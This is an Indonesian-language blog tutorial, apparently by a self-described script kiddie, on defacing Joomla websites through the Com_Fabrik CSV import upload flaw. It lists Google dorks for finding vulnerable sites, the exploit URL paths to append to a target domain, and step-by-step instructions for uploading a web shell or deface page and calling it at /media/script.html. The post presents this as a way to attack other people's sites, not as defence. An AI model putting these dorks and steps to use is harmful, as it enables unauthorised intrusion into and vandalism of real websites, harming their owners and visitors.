Deface Website Metode Com_Fabrik | File Upload Vulnerability

Deface Website Metode Com_Fabrik


Penjelasan Com_Fabrik


Com_Fabrik adalah salah satu fitur CMS Joomla yang memiliki bug upload, sehingga dapat dimanfaatkan oleh Defacer untuk merusak website tersebut, namun tidak semua website yang menggunakan CMS Joomla dapat di Exploit dengan tehnik ini, "ada banyak jalan menuju roma" mungkin itulah pribahasa yang tepat untuk website joomla, ada banyak tehnik untuk mencoba mendeface CMS Joomla salah satunya ada Com_User, Com_Fabrik dll cari aja di Mbah :p



Nah sekarang yang akan kita pelajari adalah Com_Fabrik, yang menggunakan exploit nanti akan muncul CSV untuk upload Shell atau Script Deface ente :D

Dork Com_Fabrik


Ini dork yang biasa saya pakai, silahkan kembangkan :D
||====================================||
inurl:viewTable?cid= site:com
inurl:index.php?option=com_fabrik
inurl:index.php/component/fabrik/ site:it
inurl:index.php?option=com_fabrik&view= site:id
inurl:importcsv.php site:com
inurl:”index.php?option=com_fabrik” site:”il”
||====================================||
Cari cara mengembangkan Dork Google agar dapatkan Website yang Verawan :p

Exploit Com_Fabrik


Ini exploin taruh dibelakang Domain / pathnya
||=======>>
index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
index.php?op­tion=com_fabrik&c=im­port&view=import&fil­etype=csv&tableid=1echercher
<<=======||

Contoh : www.target.co.li/ atau www.target.co.li/web/

Langkah Deface Website Metode Com_Fabrik


1. Pertama copy salah satu dorknya kemudian Paste and Search di browser :D

Deface Website Metode Com_Fabrik | File Upload Vulnerability
Deface Website Metode Com_Fabrik | File Upload Vulnerability


2. Pilih salah satu websitenya, kemudian copy Exploitnya dan paste dibelakang Domain / Path.

Deface Website Metode Com_Fabrik | File Upload Vulnerability
Deface Website Metode Com_Fabrik | File Upload Vulnerability


3. Jika website tersebut Vuln maka akan tampil dah halaman "Import CSV" disitulah tempat kita untuk mengupload Shell atau Script Deface, Klik aja Browse untuk memilihnya.

Deface Website Metode Com_Fabrik | File Upload Vulnerability


4. Sekarang pilih Shell / Script ente, ane milih script ajah :p, pilh Kemudian klik Open untuk menyetujuinya.

Deface Website Metode Com_Fabrik | File Upload Vulnerability
Deface Website Metode Com_Fabrik | File Upload Vulnerability


5. Jika file sudah terpilih lihat tanda panah No.1, kemudian klik Import CSV di tanda panah No.2 sambil berdoa semoga tidak ada masalah wkwk.

Deface Website Metode Com_Fabrik | File Upload Vulnerability
Deface Website Metode Com_Fabrik | File Upload Vulnerability


6. Jika website bisa load dengan baik tidak ada masalah, sekaran ente panggil script ente, caranya tambahkan /media/script.html dibelakang domain / path, lihat gambar dibawah ini, setelah itu jadi deh tuh website sudah terdeface :D

Deface Website Metode Com_Fabrik | File Upload Vulnerability
Deface Website Metode Com_Fabrik | File Upload Vulnerability


Video Live 

Deface Website Metode Com_Fabrik | File Upload Vulnerability

Belom Sempet bikin :P

Live Target

Ini beberapa website yang vuln dengan tehnik ini :D


Download E-Book


Deface Website Metode Com_Fabrik | File Upload Vulnerability
[ DOWNLOAD ] - [ DOWNLOAD ]



\\ ::::::::::::::: || My Contact || ::::::::::::::: //

>> Facebook     **   Abdur Rozak (Script Kiddie) 
>> Twitter          **    @JackTersakiti
>> Youtube        **   Jack Tersakiti / Jack Show Off / Siti Nur Holida
>> Instagram      **   jack_tersakiti
>> Instagram      **   jack_holida
>> BBM           **   57318B69
>> LINE          **   jack_tersakiti
>> E-Mail        **   jack_tersakiti

// :::::::: || Why So Serious || ::::::::: \\
Previous
Next Post »
0 Komentar